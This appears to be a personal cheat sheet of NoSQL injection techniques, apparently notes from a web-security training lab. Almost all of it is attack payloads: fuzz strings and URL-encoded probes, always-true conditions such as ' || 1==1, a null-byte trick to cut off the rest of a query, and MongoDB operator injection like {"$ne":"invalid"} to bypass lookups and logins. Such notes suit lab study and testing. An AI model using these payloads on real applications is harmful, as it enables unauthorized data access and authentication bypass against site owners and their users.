## Character that can cause NoSQL injection
'"`{ ;$Foo} $Foo \xYZ

https://insecure-website.com/product/lookup?category='%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00

## Once you have identify that there is a NoSQL database (Identify the specific character)

this.category == '''      ---> Should return error
this.category == '\''     ---> Should not return any error (Escaping the quote)

## Conditional behavior (this.category == '' && 0 && 'x` and `' && 1 && 'x)

Conditional statements ' && 0 && 'x and `' && 1 && 'x

' && 1 == 1
' && '1' == '1
' || 1==1
' || 1 ||
' || 1 || '
' || '1' == '1

https://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x
https://insecure-website.com/product/lookup?category=fizzy'+%26%26+1+%26%26+'x
...

## Comments

MongoDB may ignore all characters after a null character

ex: this.category == 'fizzy' && this.released == 1
    this.category == 'fizzy'\u0000' && this.released == 1   ---> Ignore Rest

https://insecure-website.com/product/lookup?category=fizzy'%00

---------------------------------------------------------------------------------

## NoSQL operator injection

- $where  - Matches documents that satisfy a JavaScript expression.
- $ne     - Matches all values that are not equal to a specified value.
- $in     - Matches all of the values specified in an array.
- $regex  - Selects documents where values match a specified regular expression.

In JSON messages, you can insert query operators as nested objects.{"username":"wiener"}` becomes `{"username":{"$ne":"invalid"}}

For URL-based inputs, you can insert query operators via URL parameters.
username=wiener ---> becomes ---> username[$ne]=invalid
 |----> If this does not work, try changing the content of the body in JSON (POST)